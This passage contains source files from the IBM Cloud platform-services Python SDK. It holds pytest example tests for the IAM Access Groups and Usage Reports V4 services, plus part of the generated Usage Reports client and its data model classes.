account_settings = iam_access_groups_service.get_account_settings(
account_id=test_account_id
).get_result()
print(json.dumps(account_settings, indent=2))
# end-get_account_settings
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_update_account_settings_example(self):
"""
update_account_settings request example
"""
try:
print('\nupdate_account_settings() result:')
# begin-update_account_settings
account_settings = iam_access_groups_service.update_account_settings(
account_id=test_account_id,
public_access_enabled=True
).get_result()
print(json.dumps(account_settings, indent=2))
# end-update_account_settings
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_delete_access_group_example(self):
"""
delete_access_group request example
"""
try:
# begin-delete_access_group
response = iam_access_groups_service.delete_access_group(
access_group_id=test_group_id
)
# end-delete_access_group
print('\ndelete_access_group() response status code:' + response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
# endregion
##############################################################################
# End of Examples for Service: IamAccessGroupsV2
##############################################################################
```
#### File: platform-services-python-sdk/examples/test_usage_reports_v4_examples.py
```python
import os
import pytest
from ibm_cloud_sdk_core import ApiException, read_external_sources
from ibm_platform_services.usage_reports_v4 import *
#
# This file provides an example of how to use the Usage Reports service.
#
# The following configuration properties are assumed to be defined:
# USAGE_REPORTS_URL=<service url>
# USAGE_REPORTS_AUTHTYPE=iam
# USAGE_REPORTS_APIKEY=<IAM api key of user with authority to create rules>
# USAGE_REPORTS_AUTH_URL=<IAM token service URL - omit this if using the production environment>
# USAGE_REPORTS_ACCOUNT_ID=<the id of the account whose usage info will be retrieved>
# USAGE_REPORTS_RESOURCE_GROUP_ID=<the id of the resource group whose usage info will be retrieved>
# USAGE_REPORTS_ORG_ID=<the id of the organization whose usage info will be retrieved>
# USAGE_REPORTS_BILLING_MONTH=<the billing month (yyyy-mm) for which usage info will be retrieved>
#
# These configuration properties can be exported as environment variables, or stored
# in a configuration file and then:
# export IBM_CREDENTIALS_FILE=<name of configuration file>
#
config_file = 'usage_reports.env'
usage_reports_service = None
config = None
account_id = None
resource_group_id = None
org_id = None
billing_month = None
##############################################################################
# Start of Examples for Service: UsageReportsV4
##############################################################################
# region
class TestUsageReportsV4Examples():
"""
Example Test Class for UsageReportsV4
"""
@classmethod
def setup_class(cls):
global usage_reports_service
if os.path.exists(config_file):
os.environ['IBM_CREDENTIALS_FILE'] = config_file
# begin-common
usage_reports_service = UsageReportsV4.new_instance(
)
# end-common
assert usage_reports_service is not None
# Load the configuration
global config
config = read_external_sources(UsageReportsV4.DEFAULT_SERVICE_NAME)
# Retrieve and verify some additional test-related config properties.
global account_id
account_id = config.get("ACCOUNT_ID")
global resource_group_id
resource_group_id = config.get("RESOURCE_GROUP_ID")
global org_id
org_id = config.get("ORG_ID")
global billing_month
billing_month = config.get("BILLING_MONTH")
assert account_id is not None
assert resource_group_id is not None
assert org_id is not None
assert billing_month is not None
print('Setup complete.')
needscredentials = pytest.mark.skipif(
not os.path.exists(config_file), reason="External configuration not available, skipping..."
)
@needscredentials
def test_get_account_summary_example(self):
"""
get_account_summary request example
"""
try:
global account_id, billing_month
print('\nget_account_summary() result:')
# begin-get_account_summary
account_summary = usage_reports_service.get_account_summary(
account_id=account_id,
billingmonth=billing_month
).get_result()
print(json.dumps(account_summary, indent=2))
# end-get_account_summary
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_account_usage_example(self):
"""
get_account_usage request example
"""
try:
global account_id, billing_month
print('\nget_account_usage() result:')
# begin-get_account_usage
account_usage = usage_reports_service.get_account_usage(
account_id=account_id,
billingmonth=billing_month
).get_result()
print(json.dumps(account_usage, indent=2))
# end-get_account_usage
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_resource_group_usage_example(self):
"""
get_resource_group_usage request example
"""
try:
global account_id, resource_group_id, billing_month
print('\nget_resource_group_usage() result:')
# begin-get_resource_group_usage
resource_group_usage = usage_reports_service.get_resource_group_usage(
account_id=account_id,
resource_group_id=resource_group_id,
billingmonth=billing_month
).get_result()
print(json.dumps(resource_group_usage, indent=2))
# end-get_resource_group_usage
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_org_usage_example(self):
"""
get_org_usage request example
"""
try:
global account_id, org_id, billing_month
print('\nget_org_usage() result:')
# begin-get_org_usage
org_usage = usage_reports_service.get_org_usage(
account_id=account_id,
organization_id=org_id,
billingmonth=billing_month
).get_result()
print(json.dumps(org_usage, indent=2))
# end-get_org_usage
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_resource_usage_account_example(self):
"""
get_resource_usage_account request example
"""
try:
global account_id, billing_month
print('\nget_resource_usage_account() result:')
# begin-get_resource_usage_account
instances_usage = usage_reports_service.get_resource_usage_account(
account_id=account_id,
billingmonth=billing_month
).get_result()
print(json.dumps(instances_usage, indent=2))
# end-get_resource_usage_account
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_resource_usage_resource_group_example(self):
"""
get_resource_usage_resource_group request example
"""
try:
global account_id, resource_group_id, billing_month
print('\nget_resource_usage_resource_group() result:')
# begin-get_resource_usage_resource_group
instances_usage = usage_reports_service.get_resource_usage_resource_group(
account_id=account_id,
resource_group_id=resource_group_id,
billingmonth=billing_month
).get_result()
print(json.dumps(instances_usage, indent=2))
# end-get_resource_usage_resource_group
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_resource_usage_org_example(self):
"""
get_resource_usage_org request example
"""
try:
global account_id, org_id, billing_month
print('\nget_resource_usage_org() result:')
# begin-get_resource_usage_org
instances_usage = usage_reports_service.get_resource_usage_org(
account_id=account_id,
organization_id=org_id,
billingmonth=billing_month
).get_result()
print(json.dumps(instances_usage, indent=2))
# end-get_resource_usage_org
except ApiException as e:
pytest.fail(str(e))
# endregion
##############################################################################
# End of Examples for Service: UsageReportsV4
##############################################################################
```
#### File: platform-services-python-sdk/ibm_platform_services/usage_reports_v4.py
```python
from datetime import datetime
from typing import Dict, List
import json
from ibm_cloud_sdk_core import BaseService, DetailedResponse
from ibm_cloud_sdk_core.authenticators.authenticator import Authenticator
from ibm_cloud_sdk_core.get_authenticator import get_authenticator_from_environment
from ibm_cloud_sdk_core.utils import datetime_to_string, string_to_datetime
from .common import get_sdk_headers
##############################################################################
# Service
##############################################################################
class UsageReportsV4(BaseService):
"""The Usage Reports V4 service."""
DEFAULT_SERVICE_URL = 'https://billing.cloud.ibm.com'
DEFAULT_SERVICE_NAME = 'usage_reports'
@classmethod
def new_instance(cls,
service_name: str = DEFAULT_SERVICE_NAME,
) -> 'UsageReportsV4':
"""
Return a new client for the Usage Reports service using the specified
parameters and external configuration.
"""
authenticator = get_authenticator_from_environment(service_name)
service = cls(
authenticator
)
service.configure_service(service_name)
return service
def __init__(self,
authenticator: Authenticator = None,
) -> None:
"""
Construct a new client for the Usage Reports service.
:param Authenticator authenticator: The authenticator specifies the authentication mechanism.
Get up to date information from https://github.com/IBM/python-sdk-core/blob/master/README.md
about initializing the authenticator of your choice.
"""
BaseService.__init__(self,
service_url=self.DEFAULT_SERVICE_URL,
authenticator=authenticator)
#########################
# Account operations
#########################
def get_account_summary(self,
account_id: str,
billingmonth: str,
**kwargs
) -> DetailedResponse:
"""
Get account summary.
Returns the summary for the account for a given month. Account billing managers
are authorized to access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `AccountSummary` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_account_summary')
headers.update(sdk_headers)
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/summary/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers)
response = self.send(request, **kwargs)
return response
def get_account_usage(self,
account_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
**kwargs
) -> DetailedResponse:
"""
Get account usage.
Usage for all the resources and plans in an account for a given month. Account
billing managers are authorized to access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `AccountUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_account_usage')
headers.update(sdk_headers)
params = {
'_names': names
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
#########################
# Resource operations
#########################
def get_resource_group_usage(self,
account_id: str,
resource_group_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
**kwargs
) -> DetailedResponse:
"""
Get resource group usage.
Usage for all the resources and plans in a resource group in a given month.
Account billing managers or resource group billing managers are authorized to
access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str resource_group_id: Resource group for which the usage report is
requested.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `ResourceGroupUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if resource_group_id is None:
raise ValueError('resource_group_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_resource_group_usage')
headers.update(sdk_headers)
params = {
'_names': names
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'resource_group_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, resource_group_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/resource_groups/{resource_group_id}/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
def get_resource_usage_account(self,
account_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
limit: int = None,
start: str = None,
resource_group_id: str = None,
organization_id: str = None,
resource_instance_id: str = None,
resource_id: str = None,
plan_id: str = None,
region: str = None,
**kwargs
) -> DetailedResponse:
"""
Get resource instance usage in an account.
Query for resource instance usage in an account. Filter the results with query
parameters. Account billing administrator is authorized to access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param int limit: (optional) Number of usage records returned. The default
value is 10. Maximum value is 20.
:param str start: (optional) The offset from which the records must be
fetched. Offset information is included in the response.
:param str resource_group_id: (optional) Filter by resource group.
:param str organization_id: (optional) Filter by organization_id.
:param str resource_instance_id: (optional) Filter by resource instance_id.
:param str resource_id: (optional) Filter by resource_id.
:param str plan_id: (optional) Filter by plan_id.
:param str region: (optional) Region in which the resource instance is
provisioned.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `InstancesUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_resource_usage_account')
headers.update(sdk_headers)
params = {
'_names': names,
'_limit': limit,
'_start': start,
'resource_group_id': resource_group_id,
'organization_id': organization_id,
'resource_instance_id': resource_instance_id,
'resource_id': resource_id,
'plan_id': plan_id,
'region': region
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/resource_instances/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
def get_resource_usage_resource_group(self,
account_id: str,
resource_group_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
limit: int = None,
start: str = None,
resource_instance_id: str = None,
resource_id: str = None,
plan_id: str = None,
region: str = None,
**kwargs
) -> DetailedResponse:
"""
Get resource instance usage in a resource group.
Query for resource instance usage in a resource group. Filter the results with
query parameters. Account billing administrator and resource group billing
administrators are authorized to access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str resource_group_id: Resource group for which the usage report is
requested.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param int limit: (optional) Number of usage records returned. The default
value is 10. Maximum value is 20.
:param str start: (optional) The offset from which the records must be
fetched. Offset information is included in the response.
:param str resource_instance_id: (optional) Filter by resource instance id.
:param str resource_id: (optional) Filter by resource_id.
:param str plan_id: (optional) Filter by plan_id.
:param str region: (optional) Region in which the resource instance is
provisioned.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `InstancesUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if resource_group_id is None:
raise ValueError('resource_group_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_resource_usage_resource_group')
headers.update(sdk_headers)
params = {
'_names': names,
'_limit': limit,
'_start': start,
'resource_instance_id': resource_instance_id,
'resource_id': resource_id,
'plan_id': plan_id,
'region': region
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'resource_group_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, resource_group_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/resource_groups/{resource_group_id}/resource_instances/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
def get_resource_usage_org(self,
account_id: str,
organization_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
limit: int = None,
start: str = None,
resource_instance_id: str = None,
resource_id: str = None,
plan_id: str = None,
region: str = None,
**kwargs
) -> DetailedResponse:
"""
Get resource instance usage in an organization.
Query for resource instance usage in an organization. Filter the results with
query parameters. Account billing administrator and organization billing
administrators are authorized to access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str organization_id: ID of the organization.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param int limit: (optional) Number of usage records returned. The default
value is 10. Maximum value is 20.
:param str start: (optional) The offset from which the records must be
fetched. Offset information is included in the response.
:param str resource_instance_id: (optional) Filter by resource instance id.
:param str resource_id: (optional) Filter by resource_id.
:param str plan_id: (optional) Filter by plan_id.
:param str region: (optional) Region in which the resource instance is
provisioned.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `InstancesUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if organization_id is None:
raise ValueError('organization_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_resource_usage_org')
headers.update(sdk_headers)
params = {
'_names': names,
'_limit': limit,
'_start': start,
'resource_instance_id': resource_instance_id,
'resource_id': resource_id,
'plan_id': plan_id,
'region': region
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'organization_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, organization_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/organizations/{organization_id}/resource_instances/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
#########################
# Organization operations
#########################
def get_org_usage(self,
account_id: str,
organization_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
**kwargs
) -> DetailedResponse:
"""
Get organization usage.
Usage for all the resources and plans in an organization in a given month. Account
billing managers or organization billing managers are authorized to access this
report.
:param str account_id: Account ID for which the usage report is requested.
:param str organization_id: ID of the organization.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `OrgUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if organization_id is None:
raise ValueError('organization_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_org_usage')
headers.update(sdk_headers)
params = {
'_names': names
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'organization_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, organization_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/organizations/{organization_id}/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
##############################################################################
# Models
##############################################################################
class AccountSummary():
"""
A summary of charges and credits for an account.
:attr str account_id: The ID of the account.
:attr str billing_month: The month in which usages were incurred. Represented in
yyyy-mm format.
:attr str billing_country_code: Country.
:attr str billing_currency_code: The currency in which the account is billed.
:attr ResourcesSummary resources: Charges related to cloud resources.
:attr List[Offer] offers: The list of offers applicable for the account for the
month.
:attr List[SupportSummary] support: Support-related charges.
:attr SubscriptionSummary subscription: A summary of charges and credits related
to a subscription.
"""
def __init__(self,
account_id: str,
billing_month: str,
billing_country_code: str,
billing_currency_code: str,
resources: 'ResourcesSummary',
offers: List['Offer'],
support: List['SupportSummary'],
subscription: 'SubscriptionSummary') -> None:
"""
Initialize a AccountSummary object.
:param str account_id: The ID of the account.
:param str billing_month: The month in which usages were incurred.
Represented in yyyy-mm format.
:param str billing_country_code: Country.
:param str billing_currency_code: The currency in which the account is
billed.
:param ResourcesSummary resources: Charges related to cloud resources.
:param List[Offer] offers: The list of offers applicable for the account
for the month.
:param List[SupportSummary] support: Support-related charges.
:param SubscriptionSummary subscription: A summary of charges and credits
related to a subscription.
"""
self.account_id = account_id
self.billing_month = billing_month
self.billing_country_code = billing_country_code
self.billing_currency_code = billing_currency_code
self.resources = resources
self.offers = offers
self.support = support
self.subscription = subscription
@classmethod
def from_dict(cls, _dict: Dict) -> 'AccountSummary':
"""Initialize a AccountSummary object from a json dictionary."""
args = {}
if 'account_id' in _dict:
args['account_id'] = _dict.get('account_id')
else:
raise ValueError('Required property \'account_id\' not present in AccountSummary JSON')
if 'billing_month' in _dict:
args['billing_month'] = _dict.get('billing_month')
else:
raise ValueError('Required property \'billing_month\' not present in AccountSummary JSON')
if 'billing_country_code' in _dict:
args['billing_country_code'] = _dict.get('billing_country_code')
else:
raise ValueError('Required property \'billing_country_code\' not present in AccountSummary JSON')
if 'billing_currency_code' in _dict:
args['billing_currency_code'] = _dict.get('billing_currency_code')
else:
raise ValueError('Required property \'billing_currency_code\' not present in AccountSummary JSON')
if 'resources' in _dict:
args['resources'] = ResourcesSummary.from_dict(_dict.get('resources'))
else:
raise ValueError('Required property \'resources\' not present in AccountSummary JSON')
if 'offers' in _dict:
args['offers'] = [Offer.from_dict(x) for x in _dict.get('offers')]
else:
raise ValueError('Required property \'offers\' not present in AccountSummary JSON')
if 'support' in _dict:
args['support'] = [SupportSummary.from_dict(x) for x in _dict.get('support')]
else:
raise ValueError('Required property \'support\' not present in AccountSummary JSON')
if 'subscription' in _dict:
args['subscription'] = SubscriptionSummary.from_dict(_dict.get('subscription'))
else:
raise ValueError('Required property \'subscription\' not present in AccountSummary JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a AccountSummary object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'account_id') and self.account_id is not None:
_dict['account_id'] = self.account_id
if hasattr(self, 'billing_month') and self.billing_month is not None:
_dict['billing_month'] = self.billing_month
if hasattr(self, 'billing_country_code') and self.billing_country_code is not None:
_dict['billing_country_code'] = self.billing_country_code
if hasattr(self, 'billing_currency_code') and self.billing_currency_code is not None:
_dict['billing_currency_code'] = self.billing_currency_code
if hasattr(self, 'resources') and self.resources is not None:
_dict['resources'] = self.resources.to_dict()
if hasattr(self, 'offers') and self.offers is not None:
_dict['offers'] = [x.to_dict() for x in self.offers]
if hasattr(self, 'support') and self.support is not None:
_dict['support'] = [x.to_dict() for x in self.support]
if hasattr(self, 'subscription') and self.subscription is not None:
_dict['subscription'] = self.subscription.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this AccountSummary object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'AccountSummary') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'AccountSummary') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class AccountUsage():
"""
The aggregated usage and charges for all the plans in the account.
:attr str account_id: The ID of the account.
:attr str pricing_country: The target country pricing that should be used.
:attr str currency_code: The currency for the cost fields in the resources,
plans and metrics.
:attr str month: The month.
:attr List[Resource] resources: All the resource used in the account.
"""
def __init__(self,
account_id: str,
pricing_country: str,
currency_code: str,
month: str,
resources: List['Resource']) -> None:
"""
Initialize a AccountUsage object.
:param str account_id: The ID of the account.
:param str pricing_country: The target country pricing that should be used.
:param str currency_code: The currency for the cost fields in the
resources, plans and metrics.
:param str month: The month.
:param List[Resource] resources: All the resource used in the account.
"""
self.account_id = account_id
self.pricing_country = pricing_country
self.currency_code = currency_code
self.month = month
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'AccountUsage':
"""Initialize a AccountUsage object from a json dictionary."""
args = {}
if 'account_id' in _dict:
args['account_id'] = _dict.get('account_id')
else:
raise ValueError('Required property \'account_id\' not present in AccountUsage JSON')
if 'pricing_country' in _dict:
args['pricing_country'] = _dict.get('pricing_country')
else:
raise ValueError('Required property \'pricing_country\' not present in AccountUsage JSON')
if 'currency_code' in _dict:
args['currency_code'] = _dict.get('currency_code')
else:
raise ValueError('Required property \'currency_code\' not present in AccountUsage JSON')
if 'month' in _dict:
args['month'] = _dict.get('month')
else:
raise ValueError('Required property \'month\' not present in AccountUsage JSON')
if 'resources' in _dict:
args['resources'] = [Resource.from_dict(x) for x in _dict.get('resources')]
else:
raise ValueError('Required property \'resources\' not present in AccountUsage JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a AccountUsage object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'account_id') and self.account_id is not None:
_dict['account_id'] = self.account_id
if hasattr(self, 'pricing_country') and self.pricing_country is not None:
_dict['pricing_country'] = self.pricing_country
if hasattr(self, 'currency_code') and self.currency_code is not None:
_dict['currency_code'] = self.currency_code
if hasattr(self, 'month') and self.month is not None:
_dict['month'] = self.month
if hasattr(self, 'resources') and self.resources is not None:
_dict['resources'] = [x.to_dict() for x in self.resources]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this AccountUsage object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'AccountUsage') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'AccountUsage') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class Discount():
"""
Information about a discount that is associated with a metric.
:attr str ref: The reference ID of the discount.
:attr str name: (optional) The name of the discount indicating category.
:attr str display_name: (optional) The name of the discount.
:attr float discount: The discount percentage.
"""
def __init__(self,
ref: str,
discount: float,
*,
name: str = None,
display_name: str = None) -> None:
"""
Initialize a Discount object.
:param str ref: The reference ID of the discount.
:param float discount: The discount percentage.
:param str name: (optional) The name of the discount indicating category.
:param str display_name: (optional) The name of the discount.
"""
self.ref = ref
self.name = name
self.display_name = display_name
self.discount = discount
@classmethod
def from_dict(cls, _dict: Dict) -> 'Discount':
"""Initialize a Discount object from a json dictionary."""
args = {}
if 'ref' in _dict:
args['ref'] = _dict.get('ref')
else:
raise ValueError('Required property \'ref\' not present in Discount JSON')
if 'name' in _dict:
args['name'] = _dict.get('name')
if 'display_name' in _dict:
args['display_name'] = _dict.get('display_name')
if 'discount' in _dict:
args['discount'] = _dict.get('discount')
else:
raise ValueError('Required property \'discount\' not present in Discount JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Discount object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'ref') and self.ref is not None:
_dict['ref'] = self.ref
if hasattr(self, 'name') and self.name is not None:
_dict['name'] = self.name
if hasattr(self, 'display_name') and self.display_name is not None:
_dict['display_name'] = self.display_name
if hasattr(self, 'discount') and self.discount is not None:
_dict['discount'] = self.discount
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Discount object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Discount') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Discount') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class InstanceUsage():
"""
The aggregated usage and charges for an instance.
:attr str account_id: The ID of the account.
:attr str resource_instance_id: The ID of the resource instance.
:attr str resource_instance_name: (optional) The name of the resource instance.
:attr str resource_id: The ID of the resource.
:attr str resource_name: (optional) The name of the resource.
:attr str resource_group_id: (optional) The ID of the resource group.
:attr str resource_group_name: (optional) The name of the resource group.
:attr str organization_id: (optional) The ID of the organization.
:attr str organization_name: (optional) The name of the organization.
:attr str space_id: (optional) The ID of the space.
:attr str space_name: (optional) The name of the space.
:attr str consumer_id: (optional) The ID of the consumer.
:attr str region: (optional) The region where instance was provisioned.
:attr str pricing_region: (optional) The pricing region where the usage that was
submitted was rated.
:attr str pricing_country: The target country pricing that should be used.
:attr str currency_code: The currency for the cost fields in the resources,
plans and metrics.
:attr bool billable: Is the cost charged to the account.
:attr str plan_id: The ID of the plan where the instance was provisioned and
rated.
:attr str plan_name: (optional) The name of the plan where the instance was
provisioned and rated.
:attr str month: The month.
:attr List[Metric] usage: All the resource used in the account.
"""
def __init__(self,
account_id: str,
resource_instance_id: str,
resource_id: str,
pricing_country: str,
currency_code: str,
billable: bool,
plan_id: str,
month: str,
usage: List['Metric'],
*,
resource_instance_name: str = None,
resource_name: str = None,
resource_group_id: str = None,
resource_group_name: str = None,
organization_id: str = None,
organization_name: str = None,
space_id: str = None,
space_name: str = None,
consumer_id: str = None,
region: str = None,
pricing_region: str = None,
plan_name: str = None) -> None:
"""
Initialize a InstanceUsage object.
:param str account_id: The ID of the account.
:param str resource_instance_id: The ID of the resource instance.
:param str resource_id: The ID of the resource.
:param str pricing_country: The target country pricing that should be used.
:param str currency_code: The currency for the cost fields in the
resources, plans and metrics.
:param bool billable: Is the cost charged to the account.
:param str plan_id: The ID of the plan where the instance was provisioned
